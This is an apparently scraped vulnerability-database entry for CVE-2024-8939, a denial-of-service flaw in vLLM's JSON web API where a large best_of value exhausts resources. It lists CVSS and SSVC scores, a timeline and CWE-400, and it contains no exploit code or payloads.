// For flags

CVE-2024-8939

Vllm: denials of service in vllm json web api

Severity Score

6.2
*CVSS v3.1

Exploit Likelihood

*EPSS

Affected Versions

*CPE

Public Exploits

0
*Multiple Sources

Exploited in Wild

-
*KEV

Decision

Track
*SSVC
Descriptions

A vulnerability was found in the ilab model serve component, where improper handling of the best_of parameter in the vllm JSON web API can lead to a Denial of Service (DoS). The API used for LLM-based sentence or chat completion accepts a best_of parameter to return the best completion from several options. When this parameter is set to a large value, the API does not handle timeouts or resource exhaustion properly, allowing an attacker to cause a DoS by consuming excessive system resources. This leads to the API becoming unresponsive, preventing legitimate users from accessing the service.

*Credits: Red Hat would like to thank Thibault Guittet for reporting this issue.
CVSS Scores
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
* Common Vulnerability Scoring System
SSVC
  • Decision:Track
Exploitation
None
Automatable
No
Tech. Impact
Partial
* Organization's Worst-case Scenario
Timeline
  • 2024-09-17 CVE Reserved
  • 2024-09-17 CVE Published
  • 2024-09-18 CVE Updated
  • 2024-09-18 EPSS Updated
  • ---------- Exploited in Wild
  • ---------- KEV Due Date
  • ---------- First Exploit
CWE
  • CWE-400: Uncontrolled Resource Consumption
CAPEC
Affected Vendors, Products, and Versions
Vendor Product Version Other Status
---- -